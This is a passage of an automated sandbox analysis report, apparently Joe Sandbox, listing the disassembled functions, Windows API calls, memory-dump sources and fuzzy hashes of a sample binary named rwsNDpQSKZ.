                • Opcode Fuzzy Hash: 1b3ff19e92735463b8db33c8d59e3ba3f0555bb7e4eb5ce1313fb7f3e3a76123
                • Instruction Fuzzy Hash: 3631FE79A01B15AFC368CF39C580B96F7E4BF49214F00452EE9AAC3B01DB71B454CB91
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CC07A0
                • StringFromCLSID.OLE32(?,?,0000004C,00CC0C88,?), ref: 00CC07EC
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(?), ref: 00CC0804
                  • Part of subcall function 00C54490: __EH_prolog3.LIBCMT ref: 00C54497
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                • CoTaskMemFree.OLE32(?,?,?,00000000,?,?), ref: 00CC0839
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: String$??0?$Cmm@@DeallocateFreeFromH_prolog3H_prolog3_Task
                • String ID:
                • API String ID: 3064493233-0
                • Opcode ID: b404816ddecf042627db5947023383ceb607096bad6e9a50766cf5f1c5ab9360
                • Instruction ID: f5746e49a29591eb5e148356f26e2a5fa76716230e38a032b296a2b6704b4200
                • Opcode Fuzzy Hash: b404816ddecf042627db5947023383ceb607096bad6e9a50766cf5f1c5ab9360
                • Instruction Fuzzy Hash: E9218E358097C89ECB11DFE4C4519DFBFF89F19300B04C85DE8E6A7702DA20A648DBA1
                APIs
                • GetLastError.KERNEL32(?,00000001,?,00CF27FA,00CED455,?,?,?,?,00CED4E1,?,00000001), ref: 00CFED45
                • _free.LIBCMT ref: 00CFEDA2
                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CF27FA,00CED455,?,?,?,?,00CED4E1,?,00000001), ref: 00CFEDE3
                  • Part of subcall function 00D0003E: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,00CED4E1,?,00000001), ref: 00D00068
                • _free.LIBCMT ref: 00CFEDD8
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ErrorLast_free$Cmm@@State@Unlock@
                • String ID:
                • API String ID: 3494935338-0
                • Opcode ID: 3ae416045fd57be3b54ca7d028ed3a5c9e5cbeef1bac1fac6e74885db2920c68
                • Instruction ID: c3cee5e7ef2405e3c76c2f4f4ac39a9c7b12c6cf0e18f5fd008063010c0edbbc
                • Opcode Fuzzy Hash: 3ae416045fd57be3b54ca7d028ed3a5c9e5cbeef1bac1fac6e74885db2920c68
                • Instruction Fuzzy Hash: 2F11A5326003887AD7A12779AC85F7A266EDBC1774B254325F728D62F1DE358E41A132
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C60523
                  • Part of subcall function 00C60601: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?), ref: 00C60619
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00000000,?,?,00000040,00C5FE18,?,0042001F,?,00D34D91,?), ref: 00C60575
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(00000004), ref: 00C605D1
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(-00000004,00000004), ref: 00C605B1
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Assign@?$State@StringUnlock@$H_prolog3H_prolog3_
                • String ID:
                • API String ID: 2318406440-0
                APIs
                • ?Clear@XMLDocument@tinyxml2@@QAEXXZ.RWSNDPQSKZ(?,?,00000000,?,00CA5CCC,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?,00000001,?,?), ref: 00CB27A8
                  • Part of subcall function 00CB23B0: ?DeleteChildren@XMLNode@tinyxml2@@QAEXXZ.RWSNDPQSKZ(?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?), ref: 00CB23B4
                  • Part of subcall function 00CB23B0: ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001), ref: 00CB23D5
                • ?Parse@XMLDocument@tinyxml2@@AAEXXZ.RWSNDPQSKZ ref: 00CB27F7
                • ?DeleteChildren@XMLNode@tinyxml2@@QAEXXZ.RWSNDPQSKZ ref: 00CB2805
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,0000000D,00000000,00000000,?,?,00000000,?,00CA5CCC,?,000000FF,00000001,00000000,000001C8,00CA29E7,?), ref: 00CB283F
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Document@tinyxml2@@$Children@DeleteError@Error@2@Node@tinyxml2@@$Clear@Parse@
                • String ID:
                • API String ID: 1658233641-0
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,9FB8111D,?,00000000,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA2A5C
                • ?FreeDuplicatedObj@CCmmArchiveServiceImp@Archive@Cmm@@QAEXPAVICmmArchiveObject@3@@Z.RWSNDPQSKZ(?,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA2A73
                  • Part of subcall function 00CA5520: __EH_prolog3.LIBCMT ref: 00CA5527
                  • Part of subcall function 00CA5520: EnterCriticalSection.KERNEL32(?,0000000C,00CA2AA9,?,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA5542
                  • Part of subcall function 00CA5520: ?FindDuplicatedPackageWithoutLock@CCmmArchiveServiceImp@Archive@Cmm@@IAE?AV?$_Vector_iterator@V?$_Vector_val@U?$_Simple_types@PAVCCmmArchivePackageTree@Archive@Cmm@@@std@@@std@@@std@@PAVICmmArchiveObject@3@@Z.RWSNDPQSKZ(?,00000000,0000000C,00CA2AA9,?,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA5555
                  • Part of subcall function 00CA5520: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,00000000,0000000C,00CA2AA9,?,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA5573
                  • Part of subcall function 00CA5520: LeaveCriticalSection.KERNEL32(?,?,00000000,0000000C,00CA2AA9,?,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA55A0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,9FB8111D,?,00000000,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA2A8D
                • ?FreeDuplicatedObj@CCmmArchiveServiceImp@Archive@Cmm@@QAEXPAVICmmArchiveObject@3@@Z.RWSNDPQSKZ(?,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA2AA4
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Archive$Cmm@@$Archive@$DuplicatedImp@Object@3@@ServiceState@Unlock@$CriticalFreeObj@PackageSectionV?$_$Cmm@@@std@@@std@@@std@@EnterFindH_prolog3LeaveLock@Simple_types@Tree@U?$_Vector_iterator@Vector_val@Without
                • String ID:
                • API String ID: 3121036383-0
                APIs
                • CancelIo.KERNEL32(?,?,?,?,?,?,00C78290), ref: 00CAC283
                • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,00C78290), ref: 00CAC292
                • ?Now@Time@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00C78290), ref: 00CAC2A1
                • _InternalDeleteHelper.LIBCONCRT(?,?,?,?,?,?,000000FF,?,?,?,?,?,?,?,?,?), ref: 00CAC2EB
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: CancelCloseCmm@@DeleteHandleHelperInternalNow@Time@V12@
                • String ID:
                • API String ID: 2841174988-0
                APIs
                • ?Connect@Channel@ssb_ipc@@QAE_NXZ.RWSNDPQSKZ ref: 00C7822B
                • EnterCriticalSection.KERNEL32(?,000000FF), ref: 00C78247
                • LeaveCriticalSection.KERNEL32(?), ref: 00C78251
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000), ref: 00C78269
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: CriticalSection$Channel@ssb_ipc@@Cmm@@Connect@EnterLeaveState@Unlock@
                • String ID:
                • API String ID: 2808090347-0
                APIs
                • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00CDA062
                • VerSetConditionMask.KERNEL32(00000000), ref: 00CDA06A
                • VerSetConditionMask.KERNEL32(00000000), ref: 00CDA072
                • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00CDA09E
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: ConditionMask$InfoVerifyVersion
                • String ID:
                • API String ID: 2793162063-0
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE068D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE06ED
                • TerminateProcess.KERNEL32(00000000), ref: 00CE06F4
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE06FB
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBC7B6
                  • Part of subcall function 00CA6112: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,?,?,00CA60F2,?,?,?,00000004), ref: 00CA6161
                  • Part of subcall function 00CA8006: __EH_prolog3.LIBCMT ref: 00CA800D
                  • Part of subcall function 00CA7EE4: __EH_prolog3.LIBCMT ref: 00CA7EEB
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(02492502,024924E6,024924DE,02492496,00000004,unordered_map/set too long,?,?,00000000,?,00000018,unordered_map/set too long,?,?,00000000,?), ref: 00CBC816
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(02492522,02492502,024924E6,024924DE,02492496,00000004,unordered_map/set too long,?,?,00000000,?,00000018,unordered_map/set too long,?,?,00000000), ref: 00CBC838
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(0249253E,02492522,02492502,024924E6,024924DE,02492496,00000004,unordered_map/set too long,?,?,00000000,?,00000018,unordered_map/set too long,?,?), ref: 00CBC84E
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: ??0?$Cmm@@StringV01@@$H_prolog3
                • String ID:
                • API String ID: 709177685-0
                APIs
                • __EH_prolog3.LIBCMT ref: 00CE201D
                • CoCreateGuid.OLE32(00000000,00000010,00CDE40F,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CE2048
                • UuidToStringA.RPCRT4(00000000,00000000), ref: 00CE2057
                  • Part of subcall function 00CDC26F: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC28A
                  • Part of subcall function 00CDC26F: GetProcessHeap.KERNEL32(00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC29C
                  • Part of subcall function 00CDC26F: HeapAlloc.KERNEL32(00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2A3
                  • Part of subcall function 00CDC26F: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2BF
                  • Part of subcall function 00CDC26F: GetProcessHeap.KERNEL32(00000000,00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2CB
                  • Part of subcall function 00CDC26F: HeapFree.KERNEL32(00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2D2
                • RpcStringFreeA.RPCRT4(00000000), ref: 00CE2080
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Heap$ByteCharFreeMultiProcessStringWide$AllocCreateGuidH_prolog3Uuid
                • String ID:
                • API String ID: 39390664-0
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE088D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE08E4
                • TerminateProcess.KERNEL32(00000000), ref: 00CE08EB
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE08F2
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00CE2B00
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,?,?,?,00CE299E,?,?,00CE2A1B), ref: 00CE2B25
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,00000000,?,?,?,?,?,00CE299E,?,?,00CE2A1B), ref: 00CE2B3F
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CE2B5B
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@LockitState@Unlock@std::_$Lockit::_Lockit::~_
                • String ID:
                • API String ID: 3239895389-0
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBC99C
                  • Part of subcall function 00CA66D4: ??0?$CStringT@_W@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(?,?,?,?,00CA66CA,?,?,?,00000004), ref: 00CA671F
                • ??0?$CStringT@_W@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(?,00000000,000000C8,00000000,00000004,00CBB099,?,0000000C,00CB9B86,?,?,00000000,?,?,00000000,?), ref: 00CBC9F8
                • ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(000000C8,?,00000000,000000C8,00000000,00000004,00CBB099,?,0000000C,00CB9B86,?,?,00000000,?,?,00000000), ref: 00CBCA16
                • ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(?,000000C8,?,00000000,000000C8,00000000,00000004,00CBB099,?,0000000C,00CB9B86,?,?,00000000,?,?), ref: 00CBCA28
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: ??0?$Cmm@@E@$$StringV01@@$H_prolog3
                • String ID:
                • API String ID: 3920246026-0
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE0A1D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE0A6D
                • TerminateProcess.KERNEL32(00000000), ref: 00CE0A74
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE0A7B
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: 1f8248d1499b902a2cd46138c723ec94462a8d5cc56bd179c0d89d9b13ce66ae
                • Instruction ID: 28b7302dab66f84702b4e0a2f73ec0afc8b4018c8cd545da3b96170e39c50209
                • Opcode Fuzzy Hash: 1f8248d1499b902a2cd46138c723ec94462a8d5cc56bd179c0d89d9b13ce66ae
                • Instruction Fuzzy Hash: 3E01B572810304BBC310AF64AC49BAB73ACFB48711F000519F919C3251DBB0594587F2
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE047D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE04C5
                • TerminateProcess.KERNEL32(00000000), ref: 00CE04CC
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE04D3
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: a6ff09ff1a0dff70ba7fde48fa5f9c9cb8753413490d38eaa829e99609a59cde
                • Instruction ID: 5d62e37c07803f7cab76792f8906f2312d92cf256246361bea717f6582ea0e84
                • Opcode Fuzzy Hash: a6ff09ff1a0dff70ba7fde48fa5f9c9cb8753413490d38eaa829e99609a59cde
                • Instruction Fuzzy Hash: 9C01B172810308ABC310EB64EC49BAB73ECAB44711F004519FA15D6281DBB09A49CBF2
                APIs
                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00D022FD,00000000,?,00D0BC0C,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00D021AE
                • GetLastError.KERNEL32(?,00D0BC0C,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00D022FD,00000000,00000104,?), ref: 00D021B8
                • __dosmaperr.LIBCMT ref: 00D021BF
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: ErrorFullLastNamePath__dosmaperr
                • String ID:
                • API String ID: 2398240785-0
                • Opcode ID: ee804e9bbf42c0eed7982cc139a6eafacf5e32a41bcefd9f5ac141749159db37
                • Instruction ID: e470817af901447d04e4eafa906c018a2df58ba0f93aa773100c6a5fb1a89bfe
                • Opcode Fuzzy Hash: ee804e9bbf42c0eed7982cc139a6eafacf5e32a41bcefd9f5ac141749159db37
                • Instruction Fuzzy Hash: B7F06231201215BBCB206F66CC08966BF69FF493603148511BA2CC6150CB31D811E7F1
                APIs
                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00D022FD,00000000,?,00D0BB97,00000000,00000000,00D022FD,?,?,00000000,00000000,00000001), ref: 00D02217
                • GetLastError.KERNEL32(?,00D0BB97,00000000,00000000,00D022FD,?,?,00000000,00000000,00000001,00000000,00000000,?,00D022FD,00000000,00000104), ref: 00D02221
                • __dosmaperr.LIBCMT ref: 00D02228
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: ErrorFullLastNamePath__dosmaperr
                • String ID:
                • API String ID: 2398240785-0
                • Opcode ID: 7c0fc4efbbbf94b7e553607d0a72e1ecc1959b820874cb3b2f015b56672d1f53
                • Instruction ID: a8b4382af30f44243fc93a0e54b786692384a831770144d1f3d313e9f6024bfa
                • Opcode Fuzzy Hash: 7c0fc4efbbbf94b7e553607d0a72e1ecc1959b820874cb3b2f015b56672d1f53
                • Instruction Fuzzy Hash: ACF04B32201215BBCA206BF6D80CA67BF69FF453A03048515B91CC6260CB31E821DBB4
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE050D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE054F
                • TerminateProcess.KERNEL32(00000000), ref: 00CE0556
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE055D
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: 99ce46128e24a48719d84f25db14ba2d0a6e98be4bc67cb94cc5c6b7a0e63fdb
                • Instruction ID: e20ecf24c48668327e0bea21e19df5377bfa042025b21171354e2347f67ec9c3
                • Opcode Fuzzy Hash: 99ce46128e24a48719d84f25db14ba2d0a6e98be4bc67cb94cc5c6b7a0e63fdb
                • Instruction Fuzzy Hash: 5501D672810304BFC710AFA49C89BEB73ACEB44715F00491DFA55C2241CBB05A49CFE2
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE060D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE0651
                • TerminateProcess.KERNEL32(00000000), ref: 00CE0658
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE065F
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: e92db68b2c97750b2f385a95036eefe0704ee3df71d9c7eea693e10c02acc553
                • Instruction ID: 1e3cf9208c5b2a4ffea7d6319bf970bca67da1f48ff4fcf8b61f8ca4ccd2ec7c
                • Opcode Fuzzy Hash: e92db68b2c97750b2f385a95036eefe0704ee3df71d9c7eea693e10c02acc553
                • Instruction Fuzzy Hash: 0601F972814304BBD711AB64EC49BEB77ACEB84715F00091DFD14D6280DBB05A49CBF2
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE058D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE05D1
                • TerminateProcess.KERNEL32(00000000), ref: 00CE05D8
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE05DF
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: 13a9162709aeee2cc6fa51550aa43d7cbbd2ec5dc00bd3ee5072900f8fa53b46
                • Instruction ID: 138f1d5b5c2a5168ce3fed692135d4ed0ecbe9c6e1e4e387303b9d54008f42c6
                • Opcode Fuzzy Hash: 13a9162709aeee2cc6fa51550aa43d7cbbd2ec5dc00bd3ee5072900f8fa53b46
                • Instruction Fuzzy Hash: A601D672814304BBD311AB64AC49BEB77ACEB44711F000519F95596281DBB05A49CBF2
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE080D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE0851
                • TerminateProcess.KERNEL32(00000000), ref: 00CE0858
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE085F
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: 59d5f0278cced23863a77a8bd5a1aca32257e8e189dffbbcad325342e4fb404f
                • Instruction ID: 797764915a648c6db283357e7ff4ab2b1a56ae16f14de41a099a6e3df13ae9c6
                • Opcode Fuzzy Hash: 59d5f0278cced23863a77a8bd5a1aca32257e8e189dffbbcad325342e4fb404f
                • Instruction Fuzzy Hash: F601F972814304BBD321AB64EC49BEB77ACEB44715F00051DF918D6280DBB06949CBF2
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE099D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE09E1
                • TerminateProcess.KERNEL32(00000000), ref: 00CE09E8
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE09EF
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: 8ac98f421bfe106d7f71786bfd259868c4239748299a0e29635877a1b002dbee
                • Instruction ID: 1161804cab194cd0b2097643e9c4f8b23d74ebcdc2662c7ba8f3ce5560ff7920
                • Opcode Fuzzy Hash: 8ac98f421bfe106d7f71786bfd259868c4239748299a0e29635877a1b002dbee
                • Instruction Fuzzy Hash: 2601D672910304BBD211AB64AC49BEB77ACEB45711F004519F914D6281DBB05949CBB2
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE091D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE0961
                • TerminateProcess.KERNEL32(00000000), ref: 00CE0968
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE096F
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: 9f9d9a10b97c8358b712051c2b085413c76f2e430e00fc432e4974788f9d16de
                • Instruction ID: 1a7b61cb2e3b1b74421702c1622adc2ca53a8c4377deb1e1672138ef2a895dc8
                • Opcode Fuzzy Hash: 9f9d9a10b97c8358b712051c2b085413c76f2e430e00fc432e4974788f9d16de
                • Instruction Fuzzy Hash: 3A01F972810304BBD311AFA4EC49BEB77ACEB44711F00051DF914D6281DBB05949CBF2
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE0AAD
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE0AF1
                • TerminateProcess.KERNEL32(00000000), ref: 00CE0AF8
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE0AFF
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: bccfb2d570da708aa5d27dc2929e17c2e3b23b440a3d3fad93d3ea87c9f0a501
                • Instruction ID: 8abf9542ee0199cd1208295dcbb5ab9845a8b636028ecc083e3096f821609113
                • Opcode Fuzzy Hash: bccfb2d570da708aa5d27dc2929e17c2e3b23b440a3d3fad93d3ea87c9f0a501
                • Instruction Fuzzy Hash: 1001D672810308BBD211AB64EC49BEB77ACEB44715F000519F914D6280DBB05949CBF2
                APIs
                • ?Clear@XMLDocument@tinyxml2@@QAEXXZ.RWSNDPQSKZ(9FB8111D,00000000,00000000,00D11AD4,000000FF,?,00CA5CF5,?,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?), ref: 00CB230B
                  • Part of subcall function 00CB23B0: ?DeleteChildren@XMLNode@tinyxml2@@QAEXXZ.RWSNDPQSKZ(?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?), ref: 00CB23B4
                  • Part of subcall function 00CB23B0: ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001), ref: 00CB23D5
                • ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(9FB8111D,00000000,00000000,00D11AD4,000000FF,?,00CA5CF5,?,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?), ref: 00CB2350
